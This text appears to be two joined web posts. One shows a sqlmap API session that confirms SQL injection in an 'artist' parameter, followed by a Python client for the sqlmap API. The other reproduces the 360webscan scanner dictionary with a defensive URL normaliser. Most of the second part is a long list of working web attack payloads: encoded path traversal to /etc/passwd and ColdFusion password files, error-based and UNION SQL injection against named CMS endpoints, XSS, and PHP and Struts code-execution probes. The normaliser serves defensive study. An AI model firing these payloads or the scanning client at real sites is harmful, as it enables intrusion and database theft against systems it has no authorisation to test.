api (a42ddaef02e976f0)> log
[12:48:55] [DEBUG] Calling http://192.168.110.1:8775/scan/a42ddaef02e976f0/log
{
    "log": [
        {"message": "flushing session file", "level": "INFO", "time": "12:48:10"},
        {"message": "testing connection to the target URL", "level": "INFO", "time": "12:48:10"},
        {"message": "checking if the target is protected by some kind of WAF/IPS/IDS", "level": "INFO", "time": "12:48:10"},
        {"message": "testing if the target URL is stable", "level": "INFO", "time": "12:48:10"},
        {"message": "target URL is stable", "level": "INFO", "time": "12:48:11"},
        {"message": "testing if GET parameter 'artist' is dynamic", "level": "INFO", "time": "12:48:11"},
        {"message": "confirming that GET parameter 'artist' is dynamic", "level": "INFO", "time": "12:48:11"},
        {"message": "GET parameter 'artist' is dynamic", "level": "INFO", "time": "12:48:11"},
        {"message": "heuristic (basic) test shows that GET parameter 'artist' might be injectable (possible DBMS: 'MySQL')", "level": "INFO", "time": "12:48:11"},
        {"message": "testing for SQL injection on GET parameter 'artist'", "level": "INFO", "time": "12:48:11"},
        {"message": "testing 'AND boolean-based blind - WHERE or HAVING clause'", "level": "INFO", "time": "12:48:11"},
        {"message": "GET parameter 'artist' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string=\"hac\")", "level": "INFO", "time": "12:48:12"},
        {"message": "testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'", "level": "INFO", "time": "12:48:12"},
        {"message": "testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (BIGINT UNSIGNED)'", "level": "INFO", "time": "12:48:12"},
        {"message": "testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'", "level": "INFO", "time": "12:48:12"},
        {"message": "testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (EXP)'", "level": "INFO", "time": "12:48:12"},
        {"message": "testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'", "level": "INFO", "time": "12:48:12"},
        {"message": "testing 'MySQL >= 5.7.8 OR error-based - WHERE, HAVING clause (JSON_KEYS)'", "level": "INFO", "time": "12:48:12"},
        {"message": "testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'", "level": "INFO", "time": "12:48:12"},
        {"message": "testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'", "level": "INFO", "time": "12:48:12"},
        {"message": "testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'", "level": "INFO", "time": "12:48:12"},
        {"message": "testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'", "level": "INFO", "time": "12:48:12"},
        {"message": "testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'", "level": "INFO", "time": "12:48:12"},
        {"message": "testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'", "level": "INFO", "time": "12:48:12"},
        {"message": "testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'", "level": "INFO", "time": "12:48:12"},
        {"message": "testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause (FLOOR)'", "level": "INFO", "time": "12:48:12"},
        {"message": "testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'", "level": "INFO", "time": "12:48:12"},
        {"message": "testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'", "level": "INFO", "time": "12:48:12"},
        {"message": "testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'", "level": "INFO", "time": "12:48:12"},
        {"message": "testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'", "level": "INFO", "time": "12:48:12"},
        {"message": "testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'", "level": "INFO", "time": "12:48:12"},
        {"message": "testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'", "level": "INFO", "time": "12:48:13"},
        {"message": "testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'", "level": "INFO", "time": "12:48:13"},
        {"message": "testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'", "level": "INFO", "time": "12:48:13"},
        {"message": "testing 'MySQL inline queries'", "level": "INFO", "time": "12:48:13"},
        {"message": "testing 'MySQL > 5.0.11 stacked queries (comment)'", "level": "INFO", "time": "12:48:13"},
        {"message": "testing 'MySQL > 5.0.11 stacked queries'", "level": "INFO", "time": "12:48:13"},
        {"message": "testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'", "level": "INFO", "time": "12:48:13"},
        {"message": "testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'", "level": "INFO", "time": "12:48:13"},
        {"message": "testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'", "level": "INFO", "time": "12:48:13"},
        {"message": "testing 'MySQL < 5.0.12 stacked queries (heavy query)'", "level": "INFO", "time": "12:48:13"},
        {"message": "testing 'MySQL >= 5.0.12 AND time-based blind'", "level": "INFO", "time": "12:48:13"},
        {"message": "GET parameter 'artist' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable ", "level": "INFO", "time": "12:48:23"},
        {"message": "testing 'Generic UNION query (NULL) - 1 to 20 columns'", "level": "INFO", "time": "12:48:23"},
        {"message": "automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found", "level": "INFO", "time": "12:48:23"},
        {"message": "'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test", "level": "INFO", "time": "12:48:23"},
        {"message": "target URL appears to have 3 columns in query", "level": "INFO", "time": "12:48:23"},
        {"message": "GET parameter 'artist' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable", "level": "INFO", "time": "12:48:24"},
        {"message": "the back-end DBMS is MySQL", "level": "INFO", "time": "12:48:24"},
        {"message": "fetching banner", "level": "INFO", "time": "12:48:24"}
    ],
    "success": true
}
api (a42ddaef02e976f0)> data
[12:48:59] [DEBUG] Calling http://192.168.110.1:8775/scan/a42ddaef02e976f0/data
{
    "data": [
        {
            "status": 1,
            "type": 0,
            "value": [
                {
                    "dbms": "MySQL",
                    "suffix": "",
                    "clause": [1, 9],
                    "notes": [],
                    "ptype": 1,
                    "dbms_version": [">= 5.0.12"],
                    "prefix": "",
                    "place": "GET",
                    "os": null,
                    "conf": {"code": null, "string": "hac", "notString": null, "titles": false, "regexp": null, "textOnly": false, "optimize": false},
                    "parameter": "artist",
                    "data": {
                        "1": {
                            "comment": "",
                            "matchRatio": 0.85,
                            "trueCode": 200,
                            "title": "AND boolean-based blind - WHERE or HAVING clause",
                            "templatePayload": null,
                            "vector": "AND [INFERENCE]",
                            "falseCode": 200,
                            "where": 1,
                            "payload": "artist=1 AND 2794=2794"
                        },
                        "5": {
                            "comment": "",
                            "matchRatio": 0.85,
                            "trueCode": 200,
                            "title": "MySQL >= 5.0.12 AND time-based blind",
                            "templatePayload": null,
                            "vector": "AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])",
                            "falseCode": null,
                            "where": 1,
                            "payload": "artist=1 AND SLEEP([SLEEPTIME])"
                        },
                        "6": {
                            "comment": "[GENERIC_SQL_COMMENT]",
                            "matchRatio": 0.85,
                            "trueCode": null,
                            "title": "Generic UNION query (NULL) - 1 to 20 columns",
                            "templatePayload": null,
                            "vector": [2, 3, "[GENERIC_SQL_COMMENT]", "", "", "NULL", 2, false, false],
                            "falseCode": null,
                            "where": 2,
                            "payload": "artist=-5376 UNION ALL SELECT NULL,NULL,CONCAT(0x716b706a71,0x4a754d495377744d4273616c436b4b6a504164666a5572477241596649704c68614672644a477474,0x7162717171)-- aAjy"
                        }
                    }
                }
            ]
        },
        {
            "status": 1,
            "type": 2,
            "value": "5.1.73-0ubuntu0.10.04.1"
        }
    ],
    "success": true,
    "error": []
}
api (a42ddaef02e976f0)> exit
$
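The client session above is nothing more than a fixed sequence of HTTP calls: GET /task/new hands back a task id, POST /scan/<id>/start takes the sqlmap options as a JSON body, and /scan/<id>/status, /log and /data are read per task until the engine reports "terminated". The following is an added example, not sqlmap's own client and not code from the original post, of a small Python client that runs that sequence end to end and always deletes its task afterwards. The endpoint paths are the ones shown in the output above plus /task/<id>/delete; the JSON option keys "getBanner" and "flushSession" (the --banner and --flush-session switches used in the run) are assumptions to check against your sqlmap version, and FakeTransport is a constructed stand-in that replays the responses seen above so the whole flow runs offline. One caveat the transcript makes visible: none of the task or scan calls carries a credential, only the administrative commands (list, flush) use the Admin ID printed at start-up, so a server bound to 0.0.0.0 as in the server example accepts scan jobs from anyone who can reach port 8775.

```python
import json
import time
import urllib.request


class SqlmapApiError(RuntimeError): """success=false from the API, a non-zero engine exit, or a timeout."""


def http_json(method, url, body=None):
    req = urllib.request.Request(url, method=method, data=None if body is None else json.dumps(body).encode(),
                                 headers={} if body is None else {"Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=30) as resp:
        return json.loads(resp.read().decode())


class SqlmapApiClient:
    def __init__(self, base_url, transport=http_json):
        self.base = base_url.rstrip("/")
        self._call = transport  # injectable, so the flow can be exercised offline

    def _req(self, method, path, body=None):
        reply = self._call(method, self.base + path, body)
        if not reply.get("success"):
            raise SqlmapApiError(f"{method} {path}: {reply.get('message', reply)}")
        return reply

    def new_task(self):
        return self._req("GET", "/task/new")["taskid"]

    def start(self, taskid, options):
        return self._req("POST", f"/scan/{taskid}/start", options)["engineid"]

    def wait(self, taskid, poll=2.0, timeout=900):
        """Poll /status until the engine leaves 'running'; a non-zero exit is an error."""
        deadline = time.monotonic() + timeout
        while True:
            st = self._req("GET", f"/scan/{taskid}/status")
            if st["status"] != "running":
                if st.get("returncode") not in (0, None):
                    raise SqlmapApiError(f"sqlmap exited with code {st['returncode']}")
                return st
            if time.monotonic() > deadline:
                raise SqlmapApiError("scan did not finish within timeout")
            time.sleep(poll)

    def data(self, taskid):
        reply = self._req("GET", f"/scan/{taskid}/data")
        return reply["data"], reply.get("error", [])

    def delete(self, taskid):
        self._req("GET", f"/task/{taskid}/delete")


def summarize(data):
    """Flatten /data: list values are injection points, string values are fetched results."""
    out = {"injections": [], "strings": []}
    for entry in data:
        value = entry.get("value")
        if isinstance(value, list):
            out["injections"] += [{"place": i["place"], "parameter": i["parameter"], "dbms": i["dbms"],
                                   "techniques": sorted(t["title"] for t in i["data"].values())} for i in value]
        elif isinstance(value, str):
            out["strings"].append(value)
    return out


def scan_once(client, target, poll=2.0):
    """new task -> start -> wait -> data; the task is deleted even if the scan fails."""
    taskid = client.new_task()
    try:
        client.start(taskid, {"url": target, "getBanner": True, "flushSession": True})  # keys assumed for --banner/--flush-session
        client.wait(taskid, poll=poll)
        data, errors = client.data(taskid)
    finally:
        client.delete(taskid)
    return dict(summarize(data), taskid=taskid, errors=errors)


class FakeTransport:  # constructed stand-in for sqlmapapi.py that replays the responses seen above
    DATA = [{"status": 1, "type": 0, "value": [{"place": "GET", "parameter": "artist", "dbms": "MySQL",
             "data": {"1": {"title": "AND boolean-based blind - WHERE or HAVING clause"},
                      "6": {"title": "Generic UNION query (NULL) - 1 to 20 columns"}}}]},
            {"status": 1, "type": 2, "value": "5.1.73-0ubuntu0.10.04.1"}]

    def __init__(self):
        self.calls, self.polls = [], 0

    def __call__(self, method, url, body=None):
        path = "/" + url.split("/", 3)[3]
        self.calls.append((method, path))
        if path.endswith("/status"):  # first poll: still running; afterwards: finished cleanly
            self.polls += 1
            return {"success": True, "status": "running", "returncode": None} if self.polls == 1 else \
                   {"success": True, "status": "terminated", "returncode": 0}
        canned = {"/task/new": {"success": True, "taskid": "a42ddaef02e976f0"},
                  "/start": {"success": True, "engineid": 4242},
                  "/data": {"success": True, "data": self.DATA, "error": []},
                  "/delete": {"success": True}}
        key = next((k for k in canned if path.endswith(k)), None)
        return canned.get(key, {"success": False, "message": f"unknown endpoint {path}"})
```

Against a live server, `scan_once(SqlmapApiClient("http://192.168.110.1:8775"), target)` uses the default urllib transport; `scan_once(SqlmapApiClient("http://127.0.0.1:8775", transport=FakeTransport()), target, poll=0)` walks the same path offline. Every failure mode (an API reply with success=false, a non-zero engine return code, a scan that never leaves "running") surfaces as SqlmapApiError, and the task is deleted in all of them so finished tasks do not accumulate on the server.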

The post "sqlmap usage manual (sqlmap usage, updated 22 August 2018)" appeared first on 🔰雚苁ℒ🔰.

360webscan dictionary: website check, directory and vulnerability scanning

360webscan dictionary

The list below is the request dictionary of the 360webscan scanner: one entry per line, each a URL path that the scanner appends to the target host, most of them carrying a probe payload (path traversal, SQL injection, XSS, template and OGNL expression injection) or naming a sensitive file (.git/config, .svn/wc.db, .bash_history, .mdb databases, Global.asa).
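
Read from the defender's side, the dictionary is also a test set for request normalisation: the same traversal to /etc/passwd or win.ini appears as %2e%2e, %252e%252e (double encoded), %c0%ae%c0%ae (overlong UTF-8), %25uff0e%25uff0e (full-width dot) and ..0x5c, precisely so that a filter matching the literal string misses it. The following is an added example, not part of the original page and not 360webscan's own code, that folds those encodings and classifies a handful of entries copied from the list below. The class names and regular expressions are this example's own illustrative rules, and the sample list is constructed (the Struts entry is shortened).

```python
import re
from urllib.parse import unquote

# Encodings the dictionary uses to smuggle "." "/" and "\" past naive filters:
# overlong UTF-8 (%c0%ae, %c0%af, %c1%9c / %c1%1c), the full-width dot (%uff0e,
# usually itself percent-encoded as %25uff0e) and a literal "0x5c" for a backslash.
OVERLONG = {"%c0%ae": ".", "%c0%af": "/", "%c1%9c": "\\", "%c1%1c": "\\",
            "%25uff0e": ".", "%uff0e": "."}


def normalize(path, rounds=3):
    """Lower-case, fold the evasion encodings and percent-decode repeatedly
    (double encoding such as %252e needs two passes), then unify separators."""
    p = path.lower()
    for _ in range(rounds):
        for enc, ch in OVERLONG.items():
            p = p.replace(enc, ch)
        decoded = unquote(p)
        if decoded == p:
            break
        p = decoded
    return p.replace("0x5c", "\\").replace("\\", "/")


# Illustrative signatures for the probe classes seen in the dictionary; these are
# this example's own rules, not 360webscan's classification.
RULES = [
    ("path-traversal", re.compile(r"\.\./|/\.\.\./|/etc/passwd|win\.ini|boot\.ini|web-inf/web\.xml")),
    ("sqli", re.compile(r"\bunion\b.*\bselect\b|\band\b\s*\d*\s*=\s*(?:char|chr)\(|updatexml\(|"
                        r"extractvalue\(|information_schema|floor\(rand\(0\)\*2\)|\bor\b\s+1=1")),
    ("xss", re.compile(r"<script|<iframe|\bprompt\(|\balert\(|onmouseover=")),
    ("code-exec", re.compile(r"\$\{@?print|class\.classloader|#context\[|md5\(base64_decode")),
    ("sensitive-file", re.compile(r"/\.git/|/\.svn/|/\.idea/|/cvs/|/\.bash|\.rediscli_history|"
                                  r"\.mdb$|global\.asax?|/conn\.asp$")),
]


def classify(path):
    """Return the probe classes an entry matches, or ['enumeration'] for a plain path."""
    norm = normalize(path)
    return [name for name, rx in RULES if rx.search(norm)] or ["enumeration"]


def coverage(entries):
    """Count entries per class: what a WAF/IDS rule set has to cover to see this scanner."""
    counts = {}
    for entry in entries:
        for cls in classify(entry):
            counts[cls] = counts.get(cls, 0) + 1
    return counts


# Constructed sample: entries copied from the dictionary below (the Struts one shortened).
SAMPLE = [
    "/%252e%252e%5C%252e%252e%5Cwindows%5Cwin.ini",
    "/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/passwd",
    "/..0x5c..0x5c..0x5cetc/passwd",
    "/%25uff0e%25uff0e/%25uff0e%25uff0e/windows/win.ini",
    "/.git/config",
    "/?callback=%3Cscript%3Eprompt(42873)%3C/script%3E",
    "/Article/?KeyWord=1'%20and%201=char(97)%20--",
    "/?s=/abc/abc/abc/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/",
    "/Index.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=false)",
    "/ActivityList.asp",
]

if __name__ == "__main__":
    for entry in SAMPLE:
        print(f"{', '.join(classify(entry)):16} {normalize(entry)}")
    print(coverage(SAMPLE))
```

The point of normalising before matching is that all four traversal variants in SAMPLE collapse to the same `../../` form; a rule written against the raw request would need one pattern per encoding and would still miss the next one. The class counts from `coverage` are a quick way to check which probe families a rule set or log parser must handle before the full dictionary is replayed against it.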

/$
/%20..%5Cweb-inf
/%22%3E%3CsCrIpT%3Eprompt(42873)
/%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5Cwindows%5Cwin.ini
/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/windows/win.ini
/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd
/%3Cscript%20s%3Ealert(42873)
/%3Cscript%3Ealert(42873).do
/%3f.jsp
/%5C
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/etc/passwd
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini
/'IHLD
/'[.](,.)(%22HLJX
/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/boot.ini
/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd
/.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./etc/passwd
/.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./windows/win.ini
/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500-52-25-1.html
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwinnt/win.ini
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c../windows/win.ini
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cetc/passwd
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../windows/win.ini
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../windows/win.ini
/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../windows/win.ini
/.../.../.../.../.../.../.../.../etc/passwd
/.../.../.../.../.../.../.../.../windows/win.ini
/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd
/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini
/.bash_history
/.bashrc
/.git/config
/.idea/
/.rediscli_history
/.svn/entries
/.svn/wc.db
//admin/include/common.inc.php?met_admin_type_ok=1&langset=web&met_langadmin[web][]=12345&str=print%28md5%281122%29%29%3B%3F%3E%2f%2f
//siteserver/cms/background_channelsGroup.aspx?publishmentSystemID=1615&nodeGroupName=1122'%20and%20char(106)%20=1%20--
//wap/board.php?filter=3%20union%20select%201,2,3,4,webscan,6,7,8,9,10,11,cfreer,13,14,15,16,17,18,19,20,21,22%20from%20boka_members%20where%20uid=1%20--%20a&classid=1a&digest=1
/3g/allcity.php?Rurl=pre-qb_city%20where%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23.html
/?%22onmouseover='prompt(42873)'bad=%22%3E
/?/home/explore/category-1)%20AND%20(SELECT%204037%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,100,114,108,58),(SELECT%20(CASE%20WHEN%20(4037=4037)%20THEN%201%20ELSE%200%20END)),CHAR(58,122,103,111,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)%20AND%20(9909=9909
/?/people/360webscan?notification_id-360webscan'
/?/people/ajax/user_actions/uid-1__actions-1)%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1(0x3336307765627363616e),(SELECT%20(CASE%20WHEN%20(8274=8274)%20THEN%201%20ELSE%200%20END)),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20and%20(1=1
/?/s_tag/hehe%25%27%20union%20select%201,2,3,md5(1122),5,6,7%20from%20go_admin%23
/?__runfile0123456789=/etc/passwd
/?__runfile0123456789=c:%5Cwindows%5Cwin.ini
/?action=course&do=-1%20AND%20(SELECT%202358%20FROM(SELECT%20COUNT(*),CONCAT(0x7765627363616E3A,(SELECT%20(CASE%20WHEN%20(2358=2358)%20THEN%201%20ELSE%200%20END)),0x3A66696E643A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%23&&todo=list
/?app=vote&controller=vote&action=total&contentid=1%20and%20cast(ascii(substring(version(),1,1))=53%20as%20signed)
/?app=widget&mod=feedlist&act=getdata&maxId=111&act=loadNew&templateCacheFile=C:%5CWindows%5Cwin.ini
/?callback=%3Cscript%3Eprompt(42873)%3C/script%3E
/?gallery-1--1--'%20%3E%3Ciframe%20src=javascript:window[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](42873)%20'--grid.html
/?m=User&a=login_800&from=tuan800&sign=xxoo&qname=%27%20AND%20%28SELECT%201%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28md5%280x7765627363616e%29%2CFLOOR%28RAND%280%29%2a2%29%29X%20FROM%20information_schema.tables%20GROUP%20BY%20X%29a%29%23
/?m=info&rewrite=1'%20union%20select%201,concat(0x23,md5(1122),0x23)%20from%20my_admin%20where%20id=1%20--%20a
/?m=info.detail&id=1-webscan
/?m=offer&s=offer_list&id=1-webscan%23
/?m=product&s=list&key=12'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%23
/?m=vote&id=&vid=1,3)%20and%20%20webscan1122%23
/?mod=account&code=Login_callback&cmd=a&from=../../../robots.txt%00
/?mod=account&code=Sendcheckmail&uname=-1%2527%20or%201=1%23
/?mod=wap&code=coupon_input&msgcode=ops-success&last[]==1%20union%20/*!select*/%201,1,1,1,1,1,1,1234567890,1%20from%20cenwor_system_members
/?overview
/?plugins&area=&class=u_sel&name=work_&q=areas&type=p,c&value=1/**/and/**/extractvalue(1,concat(0x5c,md5(1122)));--
/?plugins&q=area&name=type=p,c&area=1&area_id=updatexml(1,concat(md5(0x41144),user()),1)
/?plugins&q=prosite&site_id=updatexml(1,concat(md5(0x41144),user()),1)
/?product-75-1@%7C1122%22%3E%3Ciframe%20src=javascript:this[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](%2242873%22)%20-index.html
/?question/search/%27%75nion%20select%201,2,3,4,5,6,7,8,md5(1122),10,11,12,13,14,15,16,17,18,19,20%23
/?question/search/tag:0%27%75nion%20select%201,2,3,4,5,6,(%73elect%20concat(0x23,md5(1122),0x23)%20%66rom%20ask_user%20limit%200,1),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23.html
/?question/tag/0%27%75nion%20select%201,2,3,4,5,6,(%73elect%20concat(0x23,md5(1122),0x23)%20%66rom%20ask_user%20limit%200,1),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23.html
/?s=/abc/abc/abc/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
/?s=abc~abc~abc~$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
/?search=just_test_not_find_href
/?tag=test'%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1('360webscan'),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20'1'='1
/?user&q=action/check_email&email=%27%20and%20%28select%201%20from%20%28select%20count%28%2a%29%2Cconcat%28md5%280x7765627363616e%29%2Cfloor%28rand%280%29%2a2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
/?user&q=login&&q=check_email&email=test@sec.org%27%20and%20(Select%201%20from%20(Select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/?user&q=login&&q=check_username&username=only_test%27%20and%20(Select%201%20from%20(Select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/?user-getpass-1'
/?user-space-1'
/?xss_test%3Ciframe%20src=javascript:this[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](%2242873%22)%3E
/API/GetPageHtml.aspx
/Aboutus.asp?Title=cfreer'%20and%201=2%20union%20select%2055221122%20from%20admin
/ActivityList.asp
/Admin/LianXi.aspx?LianXiType=PingMian'%20AND%201122=char(106)%20--
/Admin/SelYangNews.aspx?NewsType=PingMianZhongXinTuPian'%20AND%201212=char(106)%20--
/Admin/sqlPlatform/operateSql.aspx
/AdminP
/Adminiscentertrator/AdmIndex.asp
/App_Site/SiteSearch.aspx?Title=1'%20AND%20(SELECT%20CHAR(58)%2bCHAR(85))%3E1%20--
/App_Site/SiteTag.aspx?Tag=1'%20and%20char(106)=1%20--
/ApplyGuide.aspx?infoFlowId=00449'and((char(106)%2bchar(59))=1)--
/Article/?KeyWord=1'%20and%201=char(97)%20--
/Article/?Type=18%20/**/and/**/1=char(106)--
/Article/ArticleDetaileNews.aspx?type=2/**/and/**/1=char(106)--
/AuthReturn.aspx?APTokenResponse=a$8SOIYyiGVYBge5mdoY5nIeAueY7BixUtLdHqpy8o3RqM9hVnisaXAA==
/BM/Project/HistoryBindSegmentLeftList.aspx?CorpType=1122&CorpCode=1122'%20and%201=char(106)%20--
/BaseCourse/FloodDisastersQueryContent.aspx?areacode=1&DirTypeDetailId=1%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--&Name=1
/BaseCourse/RushTeamCollect.aspx?adcd=1&key=1%25'%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--
/Biogenic.asp?Tbynf=21'%20and%201=char(106)%20--
/Book/user_read.jsp?classId=1'%20and%20(select%201%20from%20%20(select%20count(*),concat(0x3E7765627363616E3A66696E643C,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%20and%20'at'='at
/Brand.aspx?pageIndex=1&sortOrderBy=VistiCounts%20Desc)%20AS%20RowNumber%20FROM%20vw_Hishop_BrowseProductList%20p%20WHERE%20SaleStatus%20=%201)%20T%20WHERE%201=1%20and%201=char(106)%20--
/Broadcast/Broadcast.aspx?type='%20or%201=char(106)%20--
/Broadcast/BroadcastView.aspx?type=InfoTPXW&InfoId=1122'%20and/**/1=char(106)--
/Broadcast/BroadcastViewnew.aspx?type=InfoTPXW&InfoId=1'and%20(char(105)%2bchar(59))=1--
/Broadcast/ShowFormList.aspx?formId=1'%20and%20(char(106)%2bchar(58))=1--
/Bulletin/Businessview.aspx?infoFlowId=0'%20and/**/1=char(106)%20--
/Bulletin/CaiLiaoList.aspx?infoFlowId=1'%20and%20(char(106)%2bchar(58))=1--
/Bulletin/ColumnList.aspx?LanMuId=1'%20and/**/1=char(106)%20--
/Bulletin/DocmentDownload.aspx?ID=1122'%20and/**/1=char(106)--
/Bulletin/InfoBulletin.aspx?infoId=1'%20and%20(char(106)%2bchar(58))=1--
/Business/OfflineDownload.aspx?filetype=html&formid=1'%20and%20(char(106)%2bchar(58))=1--
/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
/CFIDE/administrator/logging/settings.cfm?locale=../../../../custommenu.xml%00en
/CVS/
/CVS/Root
